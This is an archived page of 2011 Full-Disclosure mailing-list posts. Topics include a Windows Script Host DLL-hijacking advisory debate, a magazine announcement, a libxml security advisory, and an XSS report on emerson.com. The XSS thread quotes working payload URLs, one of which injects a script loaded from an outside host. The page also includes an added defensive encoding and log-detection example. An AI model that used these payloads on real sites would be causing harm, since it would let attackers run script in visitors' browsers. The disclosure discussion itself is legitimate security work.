Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
On Mon, Sep 5, 2011 at 7:45 PM, root wrote:
> Off-topic:
>
> First Insect PRO, and now this?
> What's happening fellow Latin-americans? our standards are falling.
> Please behave, this is the Internet!

[image: The_Internet_is_Serious_Business - Low.jpg]

--
“There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Excellent points - one slight addition, though:

> In fact, the Windows Script Host software is mostly used to write system
> maintenance scripts, so it's obvious its scripts can't be restricted or
> they'd be useless.

Scripts can certainly be restricted based on the account context they are executed under. There is actually plenty one can do with "normal user" scripts, but as you've pointed out, many of the options admins require scripts for need escalated privileges. This is obviously by design, and it helps to keep admins aware of best practices when choosing to deploy solutions via scripting. There are, of course, many, many other ways one can accomplish system maintenance in a more secure way, such as WMI, PS (which can require signed scripts) and of course GPO and/or any number of other solutions.

I thought it important to outline that since, in my experience with "real" admins, WSH is actually *not* used mostly for system maintenance per se, but for standard automation. Using scripts to perform actual administrative tasks/maintenance is just a bad idea to begin with.

t
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
I agree, in some remote scenario this may work, but doesn't justify an advisory.

Off-topic:

First Insect PRO, and now this?
What's happening fellow Latin-americans? our standards are falling.
Please behave, this is the Internet!

On 09/05/2011 07:33 AM, Mario Vilas wrote:
> Paul,
>
> Those file extensions correspond to scripts. If a file contains a script
> that runs when the file is double clicked, and the scripting engine is not
> sandboxed (meaning the script can do the same things an executable file can
> do) then the attack is meaningless. You can simply have the script inside
> the file do malicious things instead of planting a DLL.
>
> Binary planting, regardless of the discussion about it being a
> "vulnerability" or not, in any case only makes sense when the file only
> contains static data, or when the file contains executable code that would
> normally not have the same privileges as a standard executable file. (A
> script that doesn't get executed when double clicking on it -for example if
> a text editor is opened instead- would be the same case as in a data file).
>
> I've never used .js or .jse scripts on Windows, but all the other extensions
> are patently not sandboxed scripts. In fact, the Windows Script Host
> software is mostly used to write system maintenance scripts, so it's obvious
> its scripts can't be restricted or they'd be useless. I'm guessing the same
> applies to .js and .jse then, and of course I wouldn't mind seeing proof
> that it doesn't. However the links you provided don't really prove anything
> (the first one even says "this is not a complete list", and I admit I've
> only glanced the second one but it seems unrelated, as it applies to file
> transfers on Microsoft Sharepoint).
>
> Planting a DLL file to be executed at the same time as other executable file
> is just a convoluted way of doing the same thing. It *may* be used in some
> strange, artificial situations, but I'm not convinced there aren't better
> ways to do it, and in any case it doesn't justify an advisory. And judging
> from what the timeline reads, I believe Microsoft simply ignored this one.
>
> I hope my explanation helped :)
> -Mario
>
> On Mon, Sep 5, 2011 at 12:54 AM, wrote:
>
>>> Application: wscript.exe
>>> Extensions: js, jse, vbe, vbs, wsf, wsh
>>> Library: wshesn.dll
>>
>> Many people commented that the above extensions are "executable"
>> already, so are (should be) treated with caution, or that they
>> can be trojaned directly without any DLL load shenanigans.
>>
>> However... looking at
>> http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx
>> http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx
>> I do not see JS listed as executable, though JSE is listed.
>>
>> Looking at
>> http://msdn.microsoft.com/en-us/library/ms722429.aspx
>> I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP
>> machine, none of the above extensions are "designated".
>>
>> Maybe DLL hijacking is useful for some of these file types, after all?
>>
>> Cheers, Paul
>>
>> Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
>> School of Mathematics and Statistics University of Sydney Australia
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
lol, the Japanese DDoSed their children and the official version is they tried to entertain them.

the official version appears as fuzzing while not knowing they were doing so.

--
joro

On Sun, Sep 04, 2011 at 05:34:00PM, Thor (Hammer of God) wrote:
> Something like Pokemon malware would be awesome:
>
> http://faculty.washington.edu/chudler/pokemon.html
>
> t
>
> -----Original Message-----
> From: Georgi Guninski [mailto:gunin...@guninski.com]
> Sent: Sunday, September 04, 2011 9:20 AM
> To: valdis.kletni...@vt.edu
> Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
>
> On Fri, Sep 02, 2011 at 05:46:15PM -0400, valdis.kletni...@vt.edu wrote:
> >
> > Prediction 1: 10 years from now, organized crime will be hiring
> > cognitive psychologists to help design more effective phish the way
> > they currently hire programmers to write better spambots.
> >
> wouldn't it be more profitable to develop a brain exploit (like what news write)?
>
> human brain doesn't seem suited enough for rooted computer output.
>
> to my knowledge 25th frame is banned in TV.
>
> if someone *releases* (partial) hypnosis malware this might be profitable and change the meaning of "botnet".
>
> --
> joro
[Full-disclosure] [Announcement] ClubHack Mag Issue 20- September 2011 Released
Hello Readers,

here we are with issue 20 of ClubHack Mag for the month of September 2011. This time the theme is Malwares. This issue covers the following articles:

0x00 Tech Gyan - Rootkits are Back with the Boot Infection
0x01 Tool Gyan - Tools for Reverse Engineering and Malware Analysis
0x02 Mom's Guide - Introduction to Malware & Malware Analysis
0x03 Legal Gyan - Law relating to Cyber Pornography in India
0x04 Matriux Vibhag - Ostinato - Wireshark in Reverse
0x05 Poster of the Month - Angry Malwares

Check http://chmag.in for articles.

The PDF version can be downloaded from:
http://chmag.in/issue/sep2011.pdf

Hope you'll enjoy the magazine. Please send your suggestions and feedback to i...@chmag.in

Regards,
Abhijeet Patil,
Co-Founder, ClubHack Mag
URL: http://chmag.in http://clubhack.com
Cell: +91-9923800379
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
On Mon, 05 Sep 2011 09:46:23 EDT, "Mr. Hinky Dink" said:
> I'm guessing you're a contractor for that particular company because,
> after all, no one knows the URL.

Google is a subcontractor for them? :)

(It's *amazing* how many sites rely on "nobody knows the URL", but the URL in question is known to Google ;)
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
The URL is publicly visible in the address bar if you open the site in Chrome. Not sure how you are categorizing it as "no one knows the url".

Try the "Email this Article" link on the page below:
http://www.emerson.com/en-US/newsroom/news-releases/emerson-financial-news/Pages/Emerson-to-Sell-Heating-Products-Business.aspx

Madhur

On Monday, September 5, 2011, Mr. Hinky Dink wrote:
>
> That... ahem... particular company has had that particular page
> (/MCS/email.aspx) in one form or another for a long time, since the late
> 90s at least, when it was a cgi app.
>
> IIRC, at one time you could SPAM anyone through it, but they learned
> their lesson and now you can only SPAM the company's employees.
> Considering the business they're in (think "SCADA" related) this could
> be a Bad Thing. The XSS is just the icing on the cake.
>
> I find it interesting that they "upgraded" it to SharePoint.
>
> It's an in-house app, one of several. I believe the security model used
> to be "no one knows the URL".
>
> I'm guessing you're a contractor for that particular company because,
> after all, no one knows the URL.
>
> On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote:
> > One of the pages in Emerson site is rendering the query string
> > parameter without any inspection. This makes it possible to inject
> > malicious content as shown below:
> >
> > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E
> >
> > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E
> >
> > --
> > Madhur
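An added example (not code from the thread or from the Emerson site) that contrasts the reflected-parameter bug quoted above with an output-encoded version of the same page, and runs a coarse check for such requests over constructed log lines; the `<h1>` rendering, the hostnames and the log lines are assumptions, since the page does not show the real Email.aspx markup.

```javascript
// Added example, not from the thread or the Emerson site. ASSUMPTION: the real
// Email.aspx markup is not on the page, so a plain <h1> containing the Title
// parameter stands in for it.

// HTML-encode the characters that let text break out of a text node or a
// quoted attribute value. Encoding belongs at the output point, not on input.
// (An attribute or JavaScript context needs its own context-specific encoder.)
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function titleParam(pageUrl) {
  // searchParams.get() already percent-decodes the value (%3C -> '<').
  return new URL(pageUrl).searchParams.get("Title") || "";
}

// Vulnerable rendering: the decoded parameter is dropped straight into markup.
function renderVulnerable(pageUrl) {
  return `<h1>${titleParam(pageUrl)}</h1>`;
}

// Hardened rendering: identical page, parameter encoded on output.
function renderSafe(pageUrl) {
  return `<h1>${htmlEncode(titleParam(pageUrl))}</h1>`;
}

// Coarse detection heuristic: any tag, javascript: URL or on*= handler in the
// decoded query string is worth a second look (expect some false positives).
const MARKUP_RE = /<\s*\/?\s*[a-z][^>]*>|javascript\s*:|\bon[a-z]+\s*=/i;

function flagRequest(requestTarget) {
  const query = new URL(requestTarget, "http://localhost").search;
  try {
    return MARKUP_RE.test(decodeURIComponent(query));
  } catch (e) {
    return true; // malformed percent-encoding is itself suspicious
  }
}

// Pull the request target out of a common-log-format line and flag it.
function scanLog(lines) {
  return lines.filter((line) => {
    const m = /"(?:GET|POST) (\S+) HTTP\//.exec(line);
    return m !== null && flagRequest(m[1]);
  });
}

// Constructed sample log lines (not from the thread); the second carries the
// img-tag form of the payload quoted in the report, with an assumed hostname.
const SAMPLE_LOG = [
  '10.0.0.5 - - [05/Sep/2011:02:00:00 +0530] "GET /_layouts/MCS/Email.aspx?Title=Emerson%20to%20Sell%20Heating%20Products%20Business HTTP/1.1" 200 512',
  '10.0.0.9 - - [05/Sep/2011:02:00:07 +0530] "GET /_layouts/MCS/Email.aspx?Title=%3Cimg%20src=%27https://example.invalid/x.jpg%27%3E HTTP/1.1" 200 640',
];

console.log(`${scanLog(SAMPLE_LOG).length} of ${SAMPLE_LOG.length} sample requests flagged`);
```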
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
That... ahem... particular company has had that particular page (/MCS/email.aspx) in one form or another for a long time, since the late 90s at least, when it was a cgi app.

IIRC, at one time you could SPAM anyone through it, but they learned their lesson and now you can only SPAM the company's employees. Considering the business they're in (think "SCADA" related) this could be a Bad Thing. The XSS is just the icing on the cake.

I find it interesting that they "upgraded" it to SharePoint.

It's an in-house app, one of several. I believe the security model used to be "no one knows the URL".

I'm guessing you're a contractor for that particular company because, after all, no one knows the URL.

On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote:
> One of the pages in Emerson site is rendering the query string
> parameter without any inspection. This makes it possible to inject
> malicious content as shown below:
>
> http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E
>
> http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E
>
> --
> Madhur
[Full-disclosure] [ MDVSA-2011:131 ] libxml
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory MDVSA-2011:131
http://www.mandriva.com/security/
___

Package : libxml
Date: September 5, 2011
Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
___

Problem Description:

Multiple vulnerabilities have been discovered and corrected in libxml/libxml2:

Integer overflow in xpath.c in libxml2 2.6.x through 2.6.32 and 2.7.x through 2.7.8, and libxml 1.8.16 and earlier, allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted XML file that triggers a heap-based buffer overflow when adding a new namespace node, related to handling of XPath expressions (CVE-2011-1944).

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to correct this issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1944
___

Updated Packages:
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Paul,

Those file extensions correspond to scripts. If a file contains a script that runs when the file is double clicked, and the scripting engine is not sandboxed (meaning the script can do the same things an executable file can do) then the attack is meaningless. You can simply have the script inside the file do malicious things instead of planting a DLL.

Binary planting, regardless of the discussion about it being a "vulnerability" or not, in any case only makes sense when the file only contains static data, or when the file contains executable code that would normally not have the same privileges as a standard executable file. (A script that doesn't get executed when double clicking on it -for example if a text editor is opened instead- would be the same case as in a data file).

I've never used .js or .jse scripts on Windows, but all the other extensions are patently not sandboxed scripts. In fact, the Windows Script Host software is mostly used to write system maintenance scripts, so it's obvious its scripts can't be restricted or they'd be useless. I'm guessing the same applies to .js and .jse then, and of course I wouldn't mind seeing proof that it doesn't. However the links you provided don't really prove anything (the first one even says "this is not a complete list", and I admit I've only glanced the second one but it seems unrelated, as it applies to file transfers on Microsoft Sharepoint).

Planting a DLL file to be executed at the same time as other executable file is just a convoluted way of doing the same thing. It *may* be used in some strange, artificial situations, but I'm not convinced there aren't better ways to do it, and in any case it doesn't justify an advisory. And judging from what the timeline reads, I believe Microsoft simply ignored this one.

I hope my explanation helped :)
-Mario

On Mon, Sep 5, 2011 at 12:54 AM, wrote:
> > Application: wscript.exe
> > Extensions: js, jse, vbe, vbs, wsf, wsh
> > Library: wshesn.dll
>
> Many people commented that the above extensions are "executable"
> already, so are (should be) treated with caution, or that they
> can be trojaned directly without any DLL load shenanigans.
>
> However... looking at
> http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx
> http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx
> I do not see JS listed as executable, though JSE is listed.
>
> Looking at
> http://msdn.microsoft.com/en-us/library/ms722429.aspx
> I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP
> machine, none of the above extensions are "designated".
>
> Maybe DLL hijacking is useful for some of these file types, after all?
>
> Cheers, Paul
>
> Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics University of Sydney Australia

--
“There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”